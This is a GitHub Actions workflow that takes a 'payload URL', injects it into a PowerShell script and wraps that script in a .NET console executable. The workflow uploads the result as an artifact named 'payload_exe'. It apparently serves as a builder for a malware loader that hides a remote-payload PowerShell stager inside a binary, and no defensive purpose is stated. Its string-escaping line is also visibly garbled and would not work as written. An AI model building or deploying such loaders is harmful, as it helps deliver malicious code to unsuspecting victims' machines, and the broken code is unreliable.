name: Build PowerShell EXE using .NET

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install .NET SDK
      run: dotnet --version

    - name: Inject URL into static_code.ps1
      run: |
        $url = '${{ github.event.inputs.payload_url }}'
        (Get-Content static_code.ps1) -replace '__PAYLOAD_URL__', $url | Set-Content static_code.ps1

    - name: Create .NET console project
      run: |
        dotnet new console -o PowerShellRunner
        cd PowerShellRunner
        dotnet add package Microsoft.PowerShell.SDK

    - name: Generate C# code with Embedded PowerShell Script
      shell: powershell
      run: |
        $ps_script = Get-Content -Path 'static_code.ps1' -Raw
        $escaped_script = $ps_script -replace """, """" -replace "r?n", "n"

        $csharp_code = @"
        using System;
        using System.Management.Automation;

        class Program {
            static void Main() {
                string script = @"$escaped_script";
                using (PowerShell ps = PowerShell.Create()) {
                    ps.AddScript(script);
                    ps.Invoke();
                }
            }
        }
        "@

        Set-Content -Path 'PowerShellRunner/Program.cs' -Value $csharp_code

    - name: Build EXE
      run: |
        cd PowerShellRunner
        dotnet build -c Release

    - name: Upload executable
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: PowerShellRunner/bin/Release/net9.0/PowerShellRunner.exe
